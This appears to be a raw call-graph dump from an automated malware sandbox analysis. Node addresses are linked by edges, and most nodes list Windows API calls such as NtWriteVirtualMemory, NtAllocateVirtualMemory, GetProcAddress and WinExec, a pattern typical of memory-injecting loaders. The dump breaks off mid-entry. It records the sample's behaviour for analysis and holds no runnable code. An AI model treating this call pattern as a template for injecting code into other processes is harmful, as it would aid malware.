25687->25690 25689 2ac3321 25688->25689 25692 2ac3339 25689->25692 25691 2ac1e2e 25690->25691 25694 2ac1e46 25691->25694 25693 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25692->25693 25701 2ac3345 25693->25701 25697 2ab881c 3 API calls 25694->25697 25696 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25695->25696 25706 2ac50a2 25696->25706 25698 2ac1e52 25697->25698 25699 2ac1e62 25698->25699 25702 2ac1e72 25699->25702 25700 2ac3353 25700->25701 25701->25700 25704 2ac3411 25701->25704 25703 2ac1e9e 25702->25703 25705 2ac1eca 25703->25705 25707 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25704->25707 25709 2ac1ed5 25705->25709 25708 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25706->25708 25714 2ac342a 25707->25714 25718 2ac511e 25708->25718 25710 2ac1ee2 25709->25710 25711 2ab881c 3 API calls 25710->25711 25712 2ac1eee 25711->25712 25713 2ac1f0f 25712->25713 25715 2ac1f1a 25713->25715 25716 2ac348d 25714->25716 25723 2ac1f46 25715->25723 25717 2ac349a 25716->25717 25719 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25717->25719 25720 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25718->25720 25721 2ac34a6 25719->25721 25730 2ac519a 25720->25730 25722 2ab8704 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25721->25722 25726 2ac34ab 25722->25726 25724 2ac1f5e 25723->25724 25725 2ab881c 3 API calls 25724->25725 25725->25507 25727 2ac3503 25726->25727 25728 2ac350e 25727->25728 25729 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25728->25729 25732 2ac3527 25729->25732 25731 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25730->25731 25737 2ac5247 25731->25737 25733 2ac357f 25732->25733 25734 2ac358a 25733->25734 25735 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25734->25735 25736 2ac35a3 25735->25736 25739 2ac35c4 25736->25739 25738 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25737->25738 25743 2ac52c3 25738->25743 25740 2ac3606 25739->25740 25741 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25740->25741 25742 2ac361f 25741->25742 25745 2ac3640 25742->25745 25744 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25743->25744 25748 2ac533f 25744->25748 25746 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25745->25746 25747 2ac369b 25746->25747 25750 2ac36aa 25747->25750 25749 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25748->25749 25753 2ac53bb 25749->25753 25751 2ac371a 25750->25751 25752 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25751->25752 25755 2ac3726 25752->25755 25754 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25753->25754 25758 2ac5437 25754->25758 25756 2ac3796 25755->25756 25757 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25756->25757 25760 2ac37a2 25757->25760 25759 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25758->25759 25762 2ac54b3 25759->25762 25761 2ac37db 25760->25761 25763 2ac3812 25761->25763 25766 2ac5513 25762->25766 26281 2ac673b 25762->26281 25764 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25763->25764 25765 2ac381e 25764->25765 25768 2ac384a 25765->25768 25767 2ac5534 25766->25767 25769 2ac553f 25767->25769 25772 2ac3863 25768->25772 25771 2ac554c 25769->25771 25770 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25785 2ac6d2c 25770->25785 25773 2ac556b 25771->25773 25774 2ac386e 25772->25774 25775 2ac5576 25773->25775 25776 2ab8798 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25774->25776 25777 2ac5583 25775->25777 25778 2ac387b 25776->25778 25779 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25777->25779 25780 2ac389c 25778->25780 25781 2ac558f 25779->25781 25783 2ac38c0 25780->25783 25782 2ac55b0 25781->25782 25784 2ac55bb 25782->25784 25788 2ac38cb 25783->25788 25787 2ac55c8 25784->25787 25786 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25785->25786 25802 2ac6da8 25786->25802 25789 2ac55e7 25787->25789 25790 2ac38d1 25788->25790 25792 2ac55f2 25789->25792 25791 2ab8798 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25790->25791 25793 2ac38d8 25791->25793 25795 2ac55ff 25792->25795 25794 2ab8704 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25793->25794 25796 2ac38dd 25794->25796 25797 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25795->25797 25798 2ac38fe 25796->25798 25799 2ac560b 25797->25799 25801 2ac3916 25798->25801 25800 2ac562c 25799->25800 25807 2ac5637 25800->25807 25804 2ac3935 25801->25804 25803 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25802->25803 25811 2ac6e24 25803->25811 25805 2ac3940 25804->25805 25806 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25805->25806 25810 2ac3959 25806->25810 25808 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25807->25808 25809 2ac5687 25808->25809 25815 2ac56b3 25809->25815 25812 2ac3992 25810->25812 25813 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25811->25813 25814 2ac39b1 25812->25814 25821 2ac6ea0 25813->25821 25816 2ac39bc 25814->25816 25820 2ac56eb 25815->25820 25817 2ac39c9 25816->25817 25818 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25817->25818 25819 2ac39d5 25818->25819 25824 2ac39f6 25819->25824 25822 2ac5722 25820->25822 25823 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25821->25823 25825 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25822->25825 25826 2ac6f1c 25823->25826 25827 2ac3a2d 25824->25827 25828 2ac573b 25825->25828 25842 2ac6f31 25826->25842 25843 2ac7a60 25826->25843 25829 2ac3a38 25827->25829 25831 2ac575c 25828->25831 25830 2ac3a45 25829->25830 25832 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25830->25832 25839 2ac5793 25831->25839 25840 2ac3a51 25832->25840 25833 2ac3a5b 25834 2ac3a5f 25833->25834 25835 2ac3aa5 25833->25835 25837 2ac3a70 25834->25837 25836 2ab8704 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25835->25836 25838 2ac3aaa 25836->25838 25837->25840 25846 2ac3ad0 25838->25846 25841 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25839->25841 25840->25833 25847 2ac57b7 25841->25847 25844 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25842->25844 25845 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25843->25845 25853 2ac6fad 25844->25853 25854 2ac7adc 25845->25854 25848 2ac3ae7 25846->25848 25849 2ac57f0 25847->25849 25850 2ac3b13 25848->25850 25851 2ac5827 25849->25851 25857 2ac3b3f 25850->25857 25852 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25851->25852 25861 2ac5833 25852->25861 25855 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25853->25855 25856 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25854->25856 25867 2ac7029 25855->25867 25866 2ac7b58 25856->25866 25858 2ac3b57 25857->25858 25859 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25858->25859 25860 2ac3b63 25859->25860 25862 2ac3b8f 25860->25862 25863 2ac58a3 25861->25863 25864 2ac3bbb 25862->25864 25865 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25863->25865 25870 2ac3bd3 25864->25870 25875 2ac58af 25865->25875 25869 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25866->25869 25868 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25867->25868 25873 2ac70a5 25868->25873 25877 2ac7bd4 25869->25877 25871 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25870->25871 25872 2ac3bdf 25871->25872 25876 2ac3c0b 25872->25876 25874 2ab8408 GetModuleHandleA GetProcAddress WinExec 25873->25874 25888 2ac70ce 25874->25888 25882 2ac5939 25875->25882 25878 2ac3c37 25876->25878 25879 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25877->25879 25881 2ac3c4f 25878->25881 25880 2ac7c50 25879->25880 25886 2ac7c65 25880->25886 25901 2ac8ae9 25880->25901 25883 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25881->25883 25885 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25882->25885 25884 2ac3c5b 25883->25884 25887 2ab8704 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25884->25887 25891 2ac597c 25885->25891 25892 2ac7c86 25886->25892 25899 2ac3c60 25887->25899 25889 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25888->25889 25908 2ac714a 25889->25908 25890 2ac3c6a 25893 2ac3c6e 25890->25893 25894 2ac3cc9 25890->25894 25896 2ac59b5 25891->25896 25898 2ac7cbd 25892->25898 25895 2ac3c94 25893->25895 25897 2ac3cea 25894->25897 25895->25899 25902 2ac59ec 25896->25902 25900 2ac3d21 25897->25900 25903 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25898->25903 25899->25890 25906 2ac3d2c 25900->25906 25904 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25901->25904 25905 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25902->25905 25912 2ac7ce1 25903->25912 25920 2ac8b65 25904->25920 25907 2ac59f8 25905->25907 25910 2ac3d39 25906->25910 25914 2ac5a24 25907->25914 25909 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25908->25909 25928 2ac71c6 25909->25928 25911 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25910->25911 25913 2ac3d45 25911->25913 25916 2ac7d1a 25912->25916 25915 2ac3d71 25913->25915 25923 2ac5a5b 25914->25923 25917 2ac3d7e 25915->25917 25918 2ac7d51 25916->25918 25919 2ac3d9d 25917->25919 25921 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25918->25921 25924 2ac3da8 25919->25924 25922 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25920->25922 25925 2ac7d5d 25921->25925 25937 2ac8be1 25922->25937 25926 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25923->25926 25930 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25924->25930 25933 2ac7d89 25925->25933 25927 2ac5a74 25926->25927 25932 2ac5a95 25927->25932 25929 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25928->25929 25947 2ac7242 25929->25947 25931 2ac3dc1 25930->25931 25934 2ac3de2 25931->25934 25935 2ac5acc 25932->25935 25936 2ac7dc0 25933->25936 25942 2ac3e19 25934->25942 25941 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25935->25941 25938 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25936->25938 25939 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25937->25939 25940 2ac7dd9 25938->25940 25964 2ac8c5d 25939->25964 25946 2ac7e05 25940->25946 25944 2ac5af0 25941->25944 25943 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25942->25943 25945 2ac3e3d 25943->25945 25949 2ac5b29 25944->25949 25950 2ac3e5e 25945->25950 25951 2ac7e28 25946->25951 25948 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25947->25948 25968 2ac72e5 25948->25968 25953 2ac5b60 25949->25953 25956 2ac3e95 25950->25956 25952 2ac7eb6 25951->25952 25954 2ac7e3a 25951->25954 25959 2ac7ed7 25952->25959 25955 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25953->25955 25963 2ac7e66 25954->25963 25958 2ac5b6c 25955->25958 25961 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25956->25961 25957 2ac9418 25960 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25957->25960 25967 2ac5b98 25958->25967 25971 2ac7eef 25959->25971 25978 2ac9494 25960->25978 25962 2ac3eb9 25961->25962 25965 2ab8704 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25962->25965 25969 2ac7e9d 25963->25969 25964->25957 25966 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25964->25966 25974 2ac3ebe 25965->25974 25981 2ac8d03 25966->25981 25975 2ac5bcf 25967->25975 25970 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25968->25970 25973 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25969->25973 25985 2ac7361 25970->25985 25972 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25971->25972 25977 2ac7f32 25972->25977 25973->25952 25984 2ac3efb 25974->25984 25976 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25975->25976 25979 2ac5be8 25976->25979 25988 2ac7f6b 25977->25988 25980 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25978->25980 25983 2ac5bf9 25979->25983 25994 2ac9510 25980->25994 25982 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25981->25982 25998 2ac8d7f 25982->25998 25990 2ac5c2e 25983->25990 25987 2ac3f34 25984->25987 25986 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25985->25986 26002 2ac73dd 25986->26002 25991 2ac3f6b 25987->25991 25989 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25988->25989 25993 2ac7fae 25989->25993 25996 2ac5c67 25990->25996 25992 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25991->25992 25997 2ac3f77 25992->25997 26010 2ac8001 25993->26010 25995 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25994->25995 26000 2ac958c 25995->26000 26001 2ac5c9e 25996->26001 26003 2ac3fa3 25997->26003 25999 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 25998->25999 26028 2ac8dfb 25999->26028 26005 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26000->26005 26006 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26001->26006 26008 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26002->26008 26004 2ac3fcf 26003->26004 26009 2ac3fda 26004->26009 26011 2ac95bf 26005->26011 26007 2ac5caa 26006->26007 26015 2ac5cd6 26007->26015 26025 2ac7478 26008->26025 26012 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26009->26012 26016 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26010->26016 26014 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26011->26014 26013 2ac3ff3 26012->26013 26019 2ac4014 26013->26019 26018 2ac95f2 26014->26018 26021 2ac5d0d 26015->26021 26017 2ac805c 26016->26017 26030 2ac807d 26017->26030 26020 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26018->26020 26023 2ac404b 26019->26023 26027 2ac9625 26020->26027 26022 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26021->26022 26024 2ac5d26 26022->26024 26026 2ac4056 26023->26026 26032 2ac5d47 26024->26032 26029 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26025->26029 26033 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26026->26033 26031 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26027->26031 26034 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26028->26034 26041 2ac74f4 26029->26041 26036 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26030->26036 26043 2ac9658 26031->26043 26037 2ac5d7e 26032->26037 26035 2ac406f 26033->26035 26046 2ac8ed2 26034->26046 26038 2ac4090 26035->26038 26049 2ac80d8 26036->26049 26039 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26037->26039 26044 2ac40c7 26038->26044 26040 2ac5da2 26039->26040 26055 2ac5dce 26040->26055 26042 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26041->26042 26064 2ac7570 26042->26064 26045 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26043->26045 26047 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26044->26047 26058 2ac96d4 26045->26058 26048 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26046->26048 26054 2ac40eb 26047->26054 26063 2ac8f4e 26048->26063 26050 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26049->26050 26051 2ac8154 26050->26051 26052 2abcf9c NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26051->26052 26065 2ac8168 26052->26065 26053 2ac40f5 26053->26054 26059 2ac4178 26053->26059 26054->26053 26056 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26055->26056 26057 2ac5e1e 26056->26057 26061 2ac5e33 26057->26061 26077 2ac6091 26057->26077 26060 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26058->26060 26062 2ac41af 26059->26062 26078 2ac9750 26060->26078 26069 2ac5e54 26061->26069 26067 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26062->26067 26068 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26063->26068 26162 2ac91cc 26063->26162 26070 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26064->26070 26071 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26065->26071 26066 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26083 2ac928e 26066->26083 26072 2ac41bb 26067->26072 26085 2ac8fdc 26068->26085 26075 2ac5e8b 26069->26075 26074 2ac762d 26070->26074 26087 2ac81e9 26071->26087 26073 2ac41e7 26072->26073 26079 2ac41f4 26073->26079 26076 2ab7dd0 GetModuleHandleA GetProcAddress 26074->26076 26080 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26075->26080 26097 2ac7650 26076->26097 26081 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26077->26081 26082 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26078->26082 26084 2ac421e 26079->26084 26086 2ac5eaf 26080->26086 26101 2ac610d 26081->26101 26088 2ac97cc 26082->26088 26089 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26083->26089 26090 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26084->26090 26091 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26085->26091 26095 2ac5ee8 26086->26095 26092 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26087->26092 26094 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26088->26094 26107 2ac930a 26089->26107 26093 2ac4237 26090->26093 26108 2ac9058 26091->26108 26110 2ac8265 26092->26110 26096 2ac4258 26093->26096 26098 2ac97ff 26094->26098 26100 2ac5f1f 26095->26100 26106 2ac4270 26096->26106 26099 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26097->26099 26102 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26098->26102 26123 2ac76cc 26099->26123 26103 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26100->26103 26104 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26101->26104 26105 2ac9832 26102->26105 26109 2ac5f2b 26103->26109 26126 2ac6189 26104->26126 26111 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26105->26111 26113 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26106->26113 26112 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26107->26112 26114 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26108->26114 26118 2ac5f57 26109->26118 26115 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26110->26115 26120 2ac9865 26111->26120 26135 2ac9386 26112->26135 26116 2ac42b3 26113->26116 26136 2ac90d4 26114->26136 26117 2ac82e1 26115->26117 26121 2ac42d4 26116->26121 26119 2ab857c GetModuleHandleA GetProcAddress 26117->26119 26140 2ac8301 26117->26140 26122 2ac5f8e 26118->26122 26119->26140 26124 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26120->26124 26129 2ac42ec 26121->26129 26127 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26122->26127 26125 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26123->26125 26132 2ac9898 26124->26132 26149 2ac7748 26125->26149 26128 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26126->26128 26131 2ac5fa7 26127->26131 26153 2ac6205 26128->26153 26130 2ac4316 26129->26130 26134 2ac4323 26130->26134 26143 2ac5fc8 26131->26143 26133 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26132->26133 26156 2ac98cb 26133->26156 26138 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26134->26138 26137 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26135->26137 26139 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26136->26139 26141 2ac9402 26137->26141 26142 2ac432f 26138->26142 26158 2ac9150 26139->26158 26144 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26140->26144 26147 2ab8ba8 7 API calls 26141->26147 26145 2ab8704 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26142->26145 26150 2ac5fff 26143->26150 26160 2ac837d 26144->26160 26146 2ac4334 26145->26146 26148 2ac4355 26146->26148 26147->25957 26161 2ac4360 26148->26161 26151 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26149->26151 26152 2ac6017 26150->26152 26167 2ac77c4 26151->26167 26154 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26152->26154 26155 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26153->26155 26165 2ac6023 26154->26165 26170 2ac6281 26155->26170 26157 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26156->26157 26174 2ac9947 26157->26174 26159 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26158->26159 26159->26162 26163 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26160->26163 26164 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26161->26164 26162->26066 26177 2ac83f9 26163->26177 26166 2ac43b0 26164->26166 26165->26077 26176 2ac43e9 26166->26176 26168 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26167->26168 26169 2ac7840 26168->26169 26171 2abaf50 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26169->26171 26172 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26170->26172 26173 2ac7851 26171->26173 26183 2ac62fd 26172->26183 26173->24995 26175 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26174->26175 26178 2ac99c3 26175->26178 26179 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26176->26179 26180 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26177->26180 26181 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26178->26181 26182 2ac442c 26179->26182 26186 2ac8475 26180->26186 26188 2ac99f6 26181->26188 26185 2ac447f 26182->26185 26184 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26183->26184 26193 2ac6379 26184->26193 26187 2ac44d7 26185->26187 26191 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26186->26191 26190 2ac44e2 26187->26190 26189 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26188->26189 26202 2ac9a72 26189->26202 26192 2ac44ef 26190->26192 26201 2ac84fc 26191->26201 26194 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26192->26194 26195 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26193->26195 26196 2ac44fb 26194->26196 26208 2ac63f5 26195->26208 26197 2ac451c 26196->26197 26198 2ac4527 26197->26198 26199 2ac4534 26198->26199 26200 2ac4553 26199->26200 26203 2ac455e 26200->26203 26204 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26201->26204 26205 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26202->26205 26206 2ac456b 26203->26206 26217 2ac8578 26204->26217 26218 2ac9aee 26205->26218 26207 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26206->26207 26209 2ac4577 26207->26209 26211 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26208->26211 26210 2ab8704 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26209->26210 26222 2ac457c 26210->26222 26234 2ac6490 26211->26234 26212 2ac4586 26213 2ac458a 26212->26213 26214 2ac45e5 26212->26214 26216 2ac459f 26213->26216 26215 2ac4606 26214->26215 26225 2ac4611 26215->26225 26221 2ac45b0 26216->26221 26219 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26217->26219 26220 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26218->26220 26230 2ac85f4 26219->26230 26223 2ac9b6a 26220->26223 26221->26222 26222->26212 26224 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26223->26224 26227 2ac9b9d 26224->26227 26226 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26225->26226 26229 2ac4661 26226->26229 26228 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26227->26228 26232 2ac9bd0 26228->26232 26233 2ac468d 26229->26233 26231 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26230->26231 26244 2ac867b 26231->26244 26235 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26232->26235 26236 2ac46c4 26233->26236 26237 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26234->26237 26238 2ac9c03 26235->26238 26239 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26236->26239 26246 2ac658b 26237->26246 26241 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26238->26241 26240 2ac46dd 26239->26240 26242 2ab8704 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26240->26242 26249 2ac9c36 26241->26249 26243 2ac46e2 26242->26243 26248 2ac4735 26243->26248 26245 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26244->26245 26252 2ac86f7 26245->26252 26247 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26246->26247 26260 2ac6607 26247->26260 26251 2ac476e 26248->26251 26250 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26249->26250 26257 2ac9cb2 26250->26257 26253 2ac47a5 26251->26253 26254 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26252->26254 26255 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26253->26255 26264 2ac8773 26254->26264 26256 2ac47b1 26255->26256 26259 2ac47dd 26256->26259 26258 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26257->26258 26262 2ac9d2e 26258->26262 26261 2ac4814 26259->26261 26263 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26260->26263 26267 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26261->26267 26266 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26262->26266 26275 2ac66bf 26263->26275 26265 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26264->26265 26277 2ac87ef 26265->26277 26270 2ac9d61 26266->26270 26268 2ac482d 26267->26268 26269 2ab8704 NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26268->26269 26276 2ac4832 26269->26276 26271 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26270->26271 26273 2ac9d94 26271->26273 26272 2ac4840 26272->26276 26274 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26273->26274 26280 2ac9dc7 26274->26280 26278 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26275->26278 26276->26272 26283 2ac48d4 26276->26283 26279 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26277->26279 26278->26281 26288 2ac886b 26279->26288 26282 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26280->26282 26281->24995 26281->25770 26285 2ac9dfa 26282->26285 26284 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26283->26284 26286 2ac4917 26284->26286 26287 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26285->26287 26290 2ac4950 26286->26290 26295 2ac9e2d 26287->26295 26289 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26288->26289 26298 2ac88e7 26289->26298 26291 2ab881c NtWriteVirtualMemory GetModuleHandleA GetProcAddress 26290->26291 26292 2ac4993 26291->26292 26293 2ab8704 